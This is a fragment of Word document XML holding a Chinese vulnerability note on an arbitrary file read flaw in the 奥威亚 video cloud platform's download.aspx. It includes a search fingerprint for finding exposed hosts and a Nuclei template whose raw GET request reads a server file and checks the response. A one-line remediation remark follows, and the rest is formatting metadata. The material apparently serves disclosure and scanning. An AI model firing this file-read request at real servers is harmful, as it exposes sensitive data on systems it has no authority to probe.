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eastAsia"/>
        </w:rPr>
        <w:t>奥威亚-视频云平台 download 任意文件读取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奥威亚-视频云平台 download 任意文件读取,攻击者可通过此漏洞获取敏感信息。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body="/CSS/NewtonTheme/assets/app.css" &amp;&amp; title!="    皖江职业教育中心学校"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65989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Nuclei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id: aoweiya-download-fileread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info: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name: aoweiya-download-fileread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author: m0be1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severity: high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http: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- raw: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- |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GET /download.aspx?file=/Tools/AS/ASRoute.aspx HTTP/1.1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Host: {{Hostname}}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User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36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Connection: close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Accept-Encoding: gzip, deflate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matchers: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- type: dsl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dsl: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- status_code==200 &amp;&amp; contains_all(body,"MyAgentServerTestListAgentServer")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1、强制用户更改口令符合密码复杂度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A8D952"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F5A8D95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FjMjk2ZGFmYzhiMGZlNDU2YjkyZTI5ZjVlNDdkMWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0572115D"/>
    <w:rsid w:val="088766C0"/>
    <w:rsid w:val="09684FD8"/>
    <w:rsid w:val="0B8E420A"/>
    <w:rsid w:val="0F9F7790"/>
    <w:rsid w:val="16247C45"/>
    <w:rsid w:val="16A064FF"/>
    <w:rsid w:val="1A862C7C"/>
    <w:rsid w:val="1D951428"/>
    <w:rsid w:val="1E6E300D"/>
    <w:rsid w:val="212D1351"/>
    <w:rsid w:val="25145328"/>
    <w:rsid w:val="2B7803BF"/>
    <w:rsid w:val="43CE2E1A"/>
    <w:rsid w:val="4813210A"/>
    <w:rsid w:val="48952158"/>
    <w:rsid w:val="4B3A317F"/>
    <w:rsid w:val="4EA62829"/>
    <w:rsid w:val="501C6CBB"/>
    <w:rsid w:val="51B95737"/>
    <w:rsid w:val="5294532B"/>
    <w:rsid w:val="56010E2D"/>
    <w:rsid w:val="570F757A"/>
    <w:rsid w:val="58B640E9"/>
    <w:rsid w:val="5F13397F"/>
    <w:rsid w:val="631F28F3"/>
    <w:rsid w:val="69877444"/>
    <w:rsid w:val="7074398C"/>
    <w:rsid w:val="70DB63F3"/>
    <w:rsid w:val="72447BF5"/>
    <w:rsid w:val="72CB65F3"/>
    <w:rsid w:val="7765702E"/>
    <w:rsid w:val="7989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2023-12-10T07:30:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-11T16:38:08Z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DCB59B1095054FCF9E23DDA822A003FF_12</vt:lpwstr>
  </property>
</Properties>
</file>